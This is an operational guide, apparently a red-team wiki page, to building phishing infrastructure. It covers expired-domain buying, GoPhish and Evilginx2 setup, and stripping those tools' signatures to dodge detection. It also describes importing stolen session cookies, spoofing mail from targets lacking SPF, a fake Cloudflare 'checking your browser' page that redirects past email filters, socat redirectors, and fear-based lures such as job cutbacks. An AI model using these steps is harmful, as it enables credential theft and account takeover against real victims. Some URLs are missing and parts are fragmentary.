Phishing Infrastructure


Configuration Overview

Domain Name


After you buy a domain set the name server records to Digital Ocean.

Buying Expired Domains


  • Domainhunter [Github]

    • Finding a domain based on keyword

    • Checks categorization against Bluecoat and IBM XForce.

    • Check IP History of Domain

Adding Content to Domain [Wayback machine]

If you want this url: but without the WebArchive toolbar?

Add “id_” before the referenced url:

Please note: The Wayback Machine doesn’t download jpgs or stylesheets when you add the “id_” to the url. Simply wget the regular version (with the toolbar, jpgs and style sheets), then wget the “id_” version later. It will write over the htmls w/ versions that don’t include the toolbar, and leave the rest in place.

Free/Paid HTML Templates

  • Get one page HTML pages.

  • Addition resources can be hosted on an S3 bucket.

Domain Categorization

During OSINT identify which internal proxy firewall technology the target is using.


  • Send Phish

  • Track interaction

  • Landing-page Hosting


  • Install Kali. Refer this

    • Firewall Rule sets:

      • ufw allow proto tcp from any to any port 80,443 [Landing page]

      • ufw allow 22

      • ufw allow 8080 [Gophish Admin page]

    • Setup tmux : Refer this

  • Set up a certificate using Let'sEncrypt.

snap install core
snap refresh core
snap install --classic certbot
sudo certbot --nginx
#Enter when prompted <space>

wget <gophish>
apt install unzip
chmod +x gophish
#update Gophish listening address in its config file config.json. 
#Use your favorite editor and change listen_url to

#Copy certs to GoPhish Directory 
# cp /etc/letsencrypt/live/[DOMIAN]/privkey.pem [DOMAIN].key 
# /etc/letsencrypt/live/[DOMAIN]/fullchain.pem [DOMAIN].crt
#Update config.json [Phish Server Param]
  • Setup the Sending Profile. Test with temp mails. If target does not have SPF records, you can send using their domain to improve trust factor.

  • Setup the landing page using 'Import URL' feature.

  • Setup up the Email Template.

    • Use stripo to create beautiful HTML emails.

    • After copying to email template, replace the URL with {{.URL}}

    • Be creative with the pretense. Use the element of fear. Eg: Job cutbacks.

  • Clone a website using landing page feature on GoPhish.

  • Launch campaign


  • Remove X-Mail Header value: gophish [Sending Profile settings]

  • Change Default RID parameter to anything else to avoid signatures. Eg: http://<URL>?rid=123

#Change this
const RecipientParameter = "rid"


  • HTTP Proxy/Router

  • BLOCK all scanning

  • Host multiple websites

  • Let'sEncrypt/SSL


apt-get update
apt-get install nginx certbot python3-certbot-nginx git golang-go unzip net-tools
apt install git make

sudo service nginx restart
nginx -t && nginx -s reload

#Set up SSL certs with LetsEncrypt
sudo certbot --nginx -d <> -d <>

#Append to /etc/resolv.conf

#Disable any other DNS services
sudo systemctl stop systemd-resolved

cd /opt
git clone
cd evilginx2
#Install globally
make install

config domain <Domain name>
config ip <IP> 


  • Remove the Signature Evilginx Headers from http_proxy.go

#Grep for ' := []byte '

hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
e := []byte{208, 165, 205, 254, 225, 228, 239, 225, 230, 240}

Inject Stolen Cookies

  • Cookie Editor Extension [Mozilla extension] -> Import stolen cookie

  • Change source-IP to that of Victim's location to avoid suspicious logs.

SMTP Servers

  • Use Valid Mail server providers to gain reputation.

Deploy SMTP Server in VPS

  • Postfix-Server-Setup : Remove sensitive information from email headers.

Rate Emails


Powershell: Send-MailMessage

Send-MailMessage -To “<recipient’s email address>” -From “<sender’s email address>”  -Subject “Your message subject” -Body “Some important plain text!” -Attachments .\data.csv -SmtpServer “<smtp server>” -Port 25


  • Use a valid domain to create free email IDs & send mails to targets


curl -s --user 'api:<API-KEY-HERE>' \<YOUR-DOMAIN-HERE>/messages \
    -F from='First Last name<noreply@YOUR-DOMAIN-HERE>' \
    -F to=<REcipient> \
    -F subject='Hello' \
    -F text='Notification'

Analyze email content for spam score

  • Test Sending Emails with

  • Use a proxy website URL while sending mails to redirect to landing page. This bypasses Email Filters and prevents scanners from flagging your landing domain as malicious.

<html lang="en-US">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>Just a moment...</title>
<table width="100%" height="100%" cellpadding="30">
<td align="center" valign="center">
<h1>Checking your browser</h1>
<div id="challenge" style="display:none;">
<p>This process is automatic. Your browser will redirect to your requested content shortly.</p>
<p>Please allow up to 5 seconds...</p>
<div style="margin-top:20px;">
<a href="" target="_blank" style="font-size: 12px;">DDoS protection by CloudFlare</a>
            window.location.href = "<INSERT-YOUR-LANDING-PAGE-HERE>";


#DNS Redirector
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<DEST IP>; echo -ne

#HTTP Redirector
socat TCP4-LISTEN:80,bind=<Interface IP>,fork TCP4:<DEST IP>:80


  • Hide our IP Address

  • IP Filtering [Based on country]

  • Domain Reputation




  • For OS Configuration

Ansible Vault | Secret Management

  • Use when using hard-coded tokens/API Keys


  • For everything other than OS Configuration.



  • Clone Github Repo

  • Set up API Keys[ Digital Ocean + Azure]

  • Configure variable files

  • Run playbook

Last updated